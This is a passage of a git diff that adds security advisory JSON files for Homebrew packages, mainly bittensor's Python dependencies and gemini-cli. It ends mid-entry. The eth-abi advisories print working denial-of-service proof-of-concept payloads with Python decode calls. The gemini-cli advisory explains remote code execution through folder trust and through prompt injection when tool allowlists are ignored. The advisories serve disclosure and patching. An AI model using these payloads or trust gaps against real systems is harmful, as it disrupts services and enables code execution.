"schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2021-33880", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-8ch4-58qp-g3mp", + "CVE-2021-33880", + "PYSEC-2021-95" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "9.1", + "resource": "websockets", + "resource_purl": "pkg:pypi/websockets@16.1.1" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "websockets", + "subject_version": "16.1.1", + "key": "pkg:pypi/websockets@16.1.1", + "resource": "websockets" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "websockets", + "subject_version": "16.1.1", + "key": "pkg:pypi/websockets@16.1.1", + "resource": "websockets" + } + ] + }, + "summary": "Observable Timing Discrepancy in aaugustin websockets library", + "details": "The aaugustin websockets library before 9.1 for Python has an Observable Timing Discrepancy on servers when HTTP Basic Authentication is enabled with basic_auth_protocol_factory(credentials=...). An attacker may be able to guess a password via a timing attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-33880" + }, + { + "type": "WEB", + "url": "https://github.com/aaugustin/websockets/commit/547a26b685d08cac0aa64e5e65f7867ac0ea9bc0" + }, + { + "type": "WEB", + "url": "https://github.com/aaugustin/websockets" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/websockets/PYSEC-2021-95.yaml" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpuapr2022.html" + }, + { + "type": "WEB", + "url": "https://www.oracle.com/security-alerts/cpujan2022.html" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2022-1930.json b/advisories/BREW-bittensor-CVE-2022-1930.json new file mode 100644 index 00000000000..922a57c4339 --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2022-1930.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2022-1930", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-v65g-f3cj-fjp4", + "CVE-2022-1930", + "PYSEC-2026-806" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "0.5.9", + "resource": "eth-account", + "resource_purl": "pkg:pypi/eth-account@0.13.7" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "eth-account", + "subject_version": "0.13.7", + "key": "pkg:pypi/eth-account@0.13.7", + "resource": "eth-account" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "eth-account", + "subject_version": "0.13.7", + "key": "pkg:pypi/eth-account@0.13.7", + "resource": "eth-account" + } + ] + }, + "summary": "Regular expression denial of service in eth-account", + "details": "An exponential ReDoS (Regular Expression Denial of Service) can be triggered in the eth-account PyPI package, when an attacker is able to supply arbitrary input to the encode_structured_data method", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-1930" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/eth-account/commit/70f89be700df0d5f08ef696252c88741f8414060" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ethereum/eth-account" + }, + { + "type": "WEB", + "url": "https://research.jfrog.com/vulnerabilities/eth-account-redos-xray-248681" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2022-40896.json b/advisories/BREW-bittensor-CVE-2022-40896.json new file mode 100644 index 00000000000..d46a914aceb --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2022-40896.json @@ -0,0 +1,121 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2022-40896", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-mrwq-x4v8-fh7p", + "CVE-2022-40896", + "PYSEC-2023-117" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.15.0", + "resource": "pygments", + "resource_purl": "pkg:pypi/pygments@2.20.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + } + ] + }, + "summary": "Pygments vulnerable to ReDoS", + "details": "A ReDoS issue was discovered in `pygments/lexers/smithy.py` in Pygments until 2.15.0 via SmithyLexer.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-40896" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/commit/97eb3d5ec7c1b3ea4fcf9dee30a2309cf92bd194" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/commit/dd52102c38ebe78cd57748e09f38929fd283ad04" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/commit/fdf182a7af85b1deeeb637ca970d31935e7c9d52" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pygments/pygments" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/blob/master/pygments/lexers/smithy.py#L61" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pygments/PYSEC-2023-117.yaml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/EZGMXALE3HSP4OXC7UUWIKX3OXKZDTY3" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VUZO4BQCIY2S2KZYHERQMKURB7AHXDBO" + }, + { + "type": "WEB", + "url": "https://pypi.org/project/Pygments" + }, + { + "type": "WEB", + "url": "https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages-part-2" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2023-26302.json b/advisories/BREW-bittensor-CVE-2023-26302.json new file mode 100644 index 00000000000..f786c03d760 --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2023-26302.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2023-26302", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-jrwr-5x3p-hvc3", + "CVE-2023-26302", + "PYSEC-2023-23" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.2.0", + "resource": "markdown-it-py", + "resource_purl": "pkg:pypi/markdown-it-py@4.2.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "markdown-it-py", + "subject_version": "4.2.0", + "key": "pkg:pypi/markdown-it-py@4.2.0", + "resource": "markdown-it-py" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "markdown-it-py", + "subject_version": "4.2.0", + "key": "pkg:pypi/markdown-it-py@4.2.0", + "resource": "markdown-it-py" + } + ] + }, + "summary": "markdown-it-py Denial of Service vulnerability in the command line interface", + "details": "Denial of service could be caused to the command line interface of markdown-it-py, before v2.2.0, if an attacker was allowed to use invalid UTF-8 characters as input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26302" + }, + { + "type": "WEB", + "url": "https://github.com/executablebooks/markdown-it-py/pull/247" + }, + { + "type": "WEB", + "url": "https://github.com/executablebooks/markdown-it-py/commit/53ca3e9c2b9e9b295f6abf7f4ad2730a9b70f68c" + }, + { + "type": "PACKAGE", + "url": "https://github.com/executablebooks/markdown-it-py" + }, + { + "type": "WEB", + "url": "https://github.com/executablebooks/markdown-it-py/releases/tag/v2.2.0" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/markdown-it-py/PYSEC-2023-23.yaml" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2023-26303.json b/advisories/BREW-bittensor-CVE-2023-26303.json new file mode 100644 index 00000000000..6d277dc0641 --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2023-26303.json @@ -0,0 +1,101 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2023-26303", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-vrjv-mxr7-vjf8", + "CVE-2023-26303", + "PYSEC-2023-24" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.2.0", + "resource": "markdown-it-py", + "resource_purl": "pkg:pypi/markdown-it-py@4.2.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "markdown-it-py", + "subject_version": "4.2.0", + "key": "pkg:pypi/markdown-it-py@4.2.0", + "resource": "markdown-it-py" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "markdown-it-py", + "subject_version": "4.2.0", + "key": "pkg:pypi/markdown-it-py@4.2.0", + "resource": "markdown-it-py" + } + ] + }, + "summary": "markdown-it-py Denial of Service vulnerability", + "details": "Denial of service could be caused to markdown-it-py, before v2.2.0, if an attacker was allowed to force null assertions with specially crafted input.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-26303" + }, + { + "type": "WEB", + "url": "https://github.com/executablebooks/markdown-it-py/pull/246" + }, + { + "type": "WEB", + "url": "https://github.com/executablebooks/markdown-it-py/commit/53ca3e9c2b9e9b295f6abf7f4ad2730a9b70f68c" + }, + { + "type": "WEB", + "url": "https://github.com/executablebooks/markdown-it-py/commit/ae03c6107dfa18e648f6fdd1280f5b89092d5d49" + }, + { + "type": "PACKAGE", + "url": "https://github.com/executablebooks/markdown-it-py" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/markdown-it-py/PYSEC-2023-24.yaml" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2023-52323.json b/advisories/BREW-bittensor-CVE-2023-52323.json new file mode 100644 index 00000000000..9963fb6e74a --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2023-52323.json @@ -0,0 +1,102 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2023-52323", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-j225-cvw7-qrx7", + "CVE-2023-52323", + "PYSEC-2024-3", + "PYSEC-2026-1811" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "3.19.1", + "resource": "pycryptodome", + "resource_purl": "pkg:pypi/pycryptodome@3.23.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pycryptodome", + "subject_version": "3.23.0", + "key": "pkg:pypi/pycryptodome@3.23.0", + "resource": "pycryptodome" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pycryptodome", + "subject_version": "3.23.0", + "key": "pkg:pypi/pycryptodome@3.23.0", + "resource": "pycryptodome" + } + ] + }, + "summary": "PyCryptodome and pycryptodomex side-channel leakage for OAEP decryption", + "details": "PyCryptodome and pycryptodomex before 3.19.1 allow side-channel leakage for OAEP decryption, exploitable for a Manger attack.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52323" + }, + { + "type": "WEB", + "url": "https://github.com/Legrandin/pycryptodome/commit/0deea1bfe1489e8c80d2053bbb06a1aa0b181ebd" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Legrandin/pycryptodome" + }, + { + "type": "WEB", + "url": "https://github.com/Legrandin/pycryptodome/blob/master/Changelog.rst" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/pycryptodomex/PYSEC-2024-3.yaml" + }, + { + "type": "WEB", + "url": "https://pypi.org/project/pycryptodomex/#history" + } + ] +} diff --git a/advisories/BREW-bittensor-CVE-2026-4539.json b/advisories/BREW-bittensor-CVE-2026-4539.json new file mode 100644 index 00000000000..6870d6b2611 --- /dev/null +++ b/advisories/BREW-bittensor-CVE-2026-4539.json @@ -0,0 +1,113 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-CVE-2026-4539", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-5239-wwwm-4pmq", + "CVE-2026-4539", + "PYSEC-2026-2987" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.20.0", + "resource": "pygments", + "resource_purl": "pkg:pypi/pygments@2.20.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + }, + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "pygments", + "subject_version": "2.20.0", + "key": "pkg:pypi/pygments@2.20.0", + "resource": "pygments" + } + ] + }, + "summary": "Pygments has Regular Expression Denial of Service (ReDoS) due to Inefficient Regex for GUID Matching", + "details": "A security flaw has been discovered in pygments before 2.20.0. The impacted element is the function AdlLexer of the file pygments/lexers/archetype.py. The manipulation results in inefficient regular expression complexity. The attack is only possible with local access. The exploit has been released to the public and may be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P" + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4539" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/issues/3058" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/pull/3064" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/commit/24b8aa76c6cd6d70f39c6dd605cce319c98e2ccc" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pygments/pygments" + }, + { + "type": "WEB", + "url": "https://github.com/pygments/pygments/releases/tag/2.20.0" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.352327" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.352327" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.774685" + } + ] +} diff --git a/advisories/BREW-bittensor-GHSA-3qwc-47jf-5rf7.json b/advisories/BREW-bittensor-GHSA-3qwc-47jf-5rf7.json new file mode 100644 index 00000000000..8d74e76684d --- /dev/null +++ b/advisories/BREW-bittensor-GHSA-3qwc-47jf-5rf7.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-GHSA-3qwc-47jf-5rf7", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-3qwc-47jf-5rf7" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "5.0.1", + "resource": "eth-abi", + "resource_purl": "pkg:pypi/eth-abi@5.2.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "eth-abi", + "subject_version": "5.2.0", + "key": "pkg:pypi/eth-abi@5.2.0", + "resource": "eth-abi" + } + ] + }, + "summary": "eth-abi is vulnerable to recursive DoS", + "details": "This is related to recent ZST stuff (https://github.com/ethereum/eth-abi/security/advisories/GHSA-rqr8-pxh7-cq3g), but it's a different one. Basically a recursive pointer issue\n\n```py\nfrom eth_abi import decode\n\n\npayload = \"0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000000a0000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020000000000000000000000000000000000000000000000000000000000000002000000000000000000000000000000000000000000000000000000000000000200000000000000000000000000000000000000000000000000000000000000020\"\n\n# OverflowError: Python int too large to convert to C ssize_t\n#decode(['(uint256[][][][][][][][][][])'], bytearray.fromhex(payload))\n\ndecode(['uint256[][][][][][][][][][]'], bytearray.fromhex(payload+('00' * 1024)))\n```", + "references": [ + { + "type": "WEB", + "url": "https://github.com/ethereum/eth-abi/security/advisories/GHSA-3qwc-47jf-5rf7" + }, + { + "type": "WEB", + "url": "https://github.com/ethereum/eth-abi/commit/82c1ad37a866472562d81fedaef0f4fed0a08269" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ethereum/eth-abi" + } + ] +} diff --git a/advisories/BREW-bittensor-GHSA-rqr8-pxh7-cq3g.json b/advisories/BREW-bittensor-GHSA-rqr8-pxh7-cq3g.json new file mode 100644 index 00000000000..dd2ac01d606 --- /dev/null +++ b/advisories/BREW-bittensor-GHSA-rqr8-pxh7-cq3g.json @@ -0,0 +1,71 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-bittensor-GHSA-rqr8-pxh7-cq3g", + "published": "2026-08-13T16:38:09Z", + "modified": "2026-08-13T16:38:09Z", + "upstream": [ + "GHSA-rqr8-pxh7-cq3g" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "bittensor", + "purl": "pkg:brew/bittensor" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "11.0.2" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "4.2.0", + "resource": "eth-abi", + "resource_purl": "pkg:pypi/eth-abi@5.2.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "eth-abi", + "subject_version": "5.2.0", + "key": "pkg:pypi/eth-abi@5.2.0", + "resource": "eth-abi" + } + ] + }, + "summary": "Ethereum ABI decoder DoS when parsing ZST", + "details": "With this notification I would like to inform about a DoS vector in the Ethereum ABI decoder. \nWe have not yet found a way to exploit this with high impact, still the bug could potentially lead to a DoS in server systems.\n\nFeel free to ask about an extension of the embargo period.\n\nTrail of Bits is informing you and other vendors as a community service, and so we do not seek a bug bounty on these issues.\n\n## BUG DESCRIPTION\n\nParsers must be written in a robust way, which avoids for example unrecoverable crashes, misinterpretation, hangs, or excessive resource consumption. The recent news about the aCropalypse bug also highlights that more subtle bugs like blind spots in file formats can lead to serious implications. Sometimes the specifications are at fault and sometimes the implementations.\n\nIn the case of the Ethereum ABI, I have to blame the specification more than the vulnerable implementations. The specification allows zero-sized-types (ZST), which can cause denial-of-service upon parsing a malicious payload and schema. If a ZST takes zero bytes when stored on disk, but after parsing occupies memory, then there is the possibility for a denial of service.\n\nFor instance, what will happen if a parser expects an array of ZST? It will try to parse as many ZST as the byte array claims to contain. The following figure first shows a payload of 20 bytes which will deserialize to an array of the numbers 2, 1, 3. The second payload will deserialize to 232 elements of a ZST like an empty tuple or empty array. \n\n20 bytes of data:\n```\nlength=0x3u64 2u32 1u32 3u32\n```\n8 bytes of data\n```\nlength=0xFFFFFFFu64\n```\n\nNow, this is not a problem if the individual elements take zero memory after parsing. Though, a common flaw is at least during serialization a large amount of memory will be required. If this case is not handled explicitly in the implementation then we are facing a DoS vector. For example, an implementation could decide to represent an array of ZST differently than a normal array and parse it in constant time, instead of looping and naively adding elements to an in-memory array.\n\nI mentioned that I believe this is a flaw in the specification. The reason for this is that the Ethereum ABI could have decided to disallow ZST completely. Actually, it turned out that in the latest versions of Solidity and Vyper it is not possible to define ZST like empty tuples or empty arrays. Even though the languages do not allow it, it is still allowed in the ABI specification.\n\n## POC\n\nWe define the data payload as `0x0000000000000000000000000000000000000000000000000000000000000020 00000000000000000000000000000000000000000000000000000000FFFFFFFF`. It consists of two 32-byte blocks, which describe a serialized array of ZST. The first block defines an offset to the array’s elements. The second block defines the length of the array. Independent of the programming language we will reference it always as payload.\n\nWe will try to decode this payload using the ABI schemata ()[] and uint32[0][]. The former represents a dynamic array of empty tuples and the latter a dynamic array of empty static arrays. The distinction between dynamic and static is important here, because an empty static array takes zero bytes, whereas a dynamic one takes a few bytes because it serializes the length of the array.\n\nThe following Python program uses the official eth_abi library and will hang and eventually cause an out-of-memory error.\n\n from eth_abi import decode\n data = bytearray.fromhex(payload)\n decode(['()[]'], data)\n\n## SUGGESTED REMEDIATION\n\nWe suggest to disallow the parsing of ZST.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/ethereum/eth-abi/security/advisories/GHSA-rqr8-pxh7-cq3g" + }, + { + "type": "PACKAGE", + "url": "https://github.com/ethereum/eth-abi" + } + ] +} diff --git a/advisories/BREW-gemini-cli-CVE-2026-12537.json b/advisories/BREW-gemini-cli-CVE-2026-12537.json new file mode 100644 index 00000000000..008a468588f --- /dev/null +++ b/advisories/BREW-gemini-cli-CVE-2026-12537.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-gemini-cli-CVE-2026-12537", + "published": "2026-08-13T16:49:58Z", + "modified": "2026-08-13T16:49:58Z", + "upstream": [ + "GHSA-wpqr-6v78-jr5g", + "CVE-2026-12537" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "gemini-cli", + "purl": "pkg:brew/gemini-cli" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.46.0" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "0.40.0-preview.3" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "npm", + "name": "@google/gemini-cli", + "subject_version": "0.46.0", + "key": "pkg:npm/%40google/gemini-cli@0.46.0" + } + ] + }, + "summary": "Gemini CLI: Remote Code Execution via workspace trust and tool allowlisting bypasses", + "details": "# Summary\n\nGemini CLI (`@google/gemini-cli`) and the `run-gemini-cli` GitHub Action are being updated to harden workspace trust and tool allowlisting, in particular when used in untrusted environments like GitHub Actions. This update introduces a breaking change to how non-interactive (headless) environments handle folder trust, which may impact existing CI/CD workflows under specific conditions.\n\n# Details\n\nFolder Trust in Headless Mode\n\nIn previous versions, Gemini CLI running in CI environments (headless mode) automatically trusted workspace folders for the purpose of loading configuration and environment variables. This is potentially risky in situations where Gemini CLI runs on untrusted folders in headless mode (e.g. CI workflows that review user-submitted pull requests). If used with untrusted directory contents, this could lead to remote code execution via malicious environment variables in the local `.gemini/` directory.\n\nTo ensure consistency and user control, the latest update aligns headless mode behavior with interactive mode, requiring folders to be explicitly trusted before configuration files (such as `.env`) are processed.\n\nAs a result of this change, GitHub Actions and other automated pipelines that rely on the previous automatic trust behavior will fail to load workspace-specific settings until they are updated to use explicit trust mechanisms.\n\nTool Allowlisting under \\--yolo\n\nIn previous versions, when Gemini CLI was configured to run in `--yolo` mode, it would ignore any fine grained tool allowlist in `~/.gemini/settings.json` (e.g. `run_shell_command(echo)` would allow any command). This is potentially risky in situations where Gemini CLI runs on untrusted inputs with `--yolo` (e.g. CI workflows that triage user-submitted GitHub issues where we recommend a strict allowlist). If used with untrusted content and a tool allowlist that permits `run_shell_command`, this could lead to remote code execution via prompt injection.\n\nIn version `0.39.1`, the Gemini CLI policy engine now evaluates tool allowlisting under `--yolo` mode, which is useful for CI workflows that allowlist a few safe commands to run when processing untrusted inputs. As a result, some workflows that previously depended on this behavior may fail silently unless tool allowlists are modified to fit the task.\n\n# Impact\n\nThis impact is limited to workflows using Gemini CLI in headless mode. Any use of Gemini CLI in headless mode without folder trust will require manual review to correctly configure folder trust. **This affects all Gemini CLI GitHub Actions.** Users must review their workflows, and take one of two approaches:\n\n1\\. If the workflow runs on trusted inputs (e.g. reviewing PRs from trusted collaborators), set `GEMINI_TRUST_WORKSPACE: 'true'` in your workflow.\n\n2\\. If the workflow runs on untrusted inputs, review our guidance in [google-github-actions/run-gemini-cli](https://github.com/google-github-actions/run-gemini-cli) to harden your workflow against malicious content, and set the environment variable.\n\n# Patches\n\nThe folder trust and tool allowlisting mitigations are available in `@google/gemini-cli` version `0.39.1` and `0.40.0-preview.3`. By default, the `run-gemini-cli` GitHub Action will receive and run the latest version of `gemini-cli`. However, if your workflow specifies a version of `gemini-cli` by setting the [gemini\\_cli\\_version](https://github.com/google-github-actions/run-gemini-cli#user-content-__input_gemini_cli_version), you are encouraged to upgrade to one of the patched versions and audit the workflow settings that use Gemini CLI.\n\n# Credits\n\nGemini thanks the following security researchers for reporting this issue through the Vulnerability Rewards Program (g.co/vulnz):\n\n* Elad Meged, Novee Security\n* Dan Lisichkin, Pillar Security research team", + "severity": [ + { + "type": "CVSS_V3", + "score": 